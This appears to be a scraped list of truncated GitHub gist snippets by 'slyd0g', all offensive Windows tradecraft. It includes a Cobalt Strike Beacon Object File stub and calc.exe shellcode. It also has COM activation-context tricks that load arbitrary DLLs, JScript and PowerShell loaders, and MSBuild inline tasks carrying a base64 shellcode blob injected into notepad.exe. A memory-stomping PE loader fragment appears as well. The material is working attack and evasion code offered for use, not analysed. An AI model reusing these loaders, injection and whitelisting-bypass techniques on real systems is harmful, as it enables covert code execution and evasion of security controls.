slyd0g

#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"


DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);

slyd0g

; Copyright (c) 2009-2014, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; and Peter Ferrie <peter.ferrie@gmail.com>
; Project homepage: http://code.google.com/p/win-exec-calc-shellcode/
; All rights reserved. See COPYRIGHT.txt for details.

; Windows x64 null-free shellcode that executes calc.exe.
; Works in any x64 application for Windows 5.0-6.3 all service packs.

;
; nasm -f win64 LoadRunner.asm

slyd0g

#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.

# Sample DLL To inject here 
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179

$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> 	<file name="Anyname.dll.anything">     	<comClass         	description="Any Description HERE"         	clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both"         	progid="JustMakeSomethingUp"/> 	</file>  </assembly>';
$ax = new-object -Com "Microsoft.Windows.ActCtx"
$ax.ManifestText = $manifest;
$DWX = $ax.CreateObject("JustMakeSomethingUp");

slyd0g

//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/


var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> 	<file name="dynwrapx.dll">     	<comClass         	description="DynamicWrapperX Class"         	clsid="{89565276-A714-4a43-912E-978B935EDCCC}"         	threadingModel="Both"         	progid="DynamicWrapperX"/> 	</file>  </assembly>';
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dropPath = fso.GetSpecialFolder(2);

// Create Base64 Object, supports encode, decode 
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac

slyd0g

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe kernel.xml -->
  <Target Name="Hello">
   
   <ClassExample />
	
  </Target>
	<UsingTask
    TaskName="ClassExample"

slyd0g

/*
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
            <Target Name="MyTarget">
                <SimpleTask MyProperty="My voice is my passport."
				MyCode="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"
				MyProcess="C:\Windows\notepad.exe"/>
            </Target>
        <UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" />
    </Project>
*/

slyd0g

try {
	
	new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Users\\Public';
	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> 	<file name="dynwrapx.dll.blg">     	<comClass         	description="DynamicWrapperX Class"         	clsid="{89565276-A714-4a43-912E-978B935EDCCC}"         	threadingModel="Both"         	progid="DynamicWrapperX"/> 	</file>  </assembly>';
	

	// Create Base64 Object, supports encode, decode 
	
	//Magic is just a cool way to decode to byte array ;
	function Magic(r){if(!/^[a-z0-9+/]+={0,2}$/i.test(r)||r.length%4!=0)throw Error("Not base64 string");for(var t,e,n,o,i,a,f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",h=[],d=0;d<r.length;d+=4)t=(a=f.indexOf(r.charAt(d))<<18|f.indexOf(r.charAt(d+1))<<12|(o=f.indexOf(r.charAt(d+2)))<<6|(i=f.indexOf(r.charAt(d+3))))>>>16&255,e=a>>>

slyd0g

		MapImg = MemAllocateStomped( &fTable, ImgLen );
		
		if ( !MapImg ) {
			sParam.ImgMod = TRUE;
			MapImg = MemAllocateVirtual( &fTable, ImgLen );
		};
		InlineZeroMemory( MapImg, ImgLen );

		SecHdr = IMAGE_FIRST_SECTION( NtsHdr );
		for ( INT i = 0 ; i < NtsHdr->FileHeader.NumberOfSections ; ++i ) {

slyd0g

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!-- 
	
		Author: Casey Smith, Twitter: @subTee
		 
		License: BSD 3-Clause
	

slyd0g

# Make Sure dynwrapx,dll is in %temp%
$a = new-object -com Microsoft.Windows.ActCtx
$a.ManifestURL = 'https://gist.githubusercontent.com/subTee/36df32293bc5006148bb6b03b5c4b2c1/raw/661b5aafd55288930761d9ad4eabe7403146ab5c/dynwrapx.dll.manifest'

$b = $a.CreateObject("DynamicWrapperX")
$b.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l") | Out-Null
$b.MessageBoxW(0, "Hello, world!", "Test", 4) | Out-Null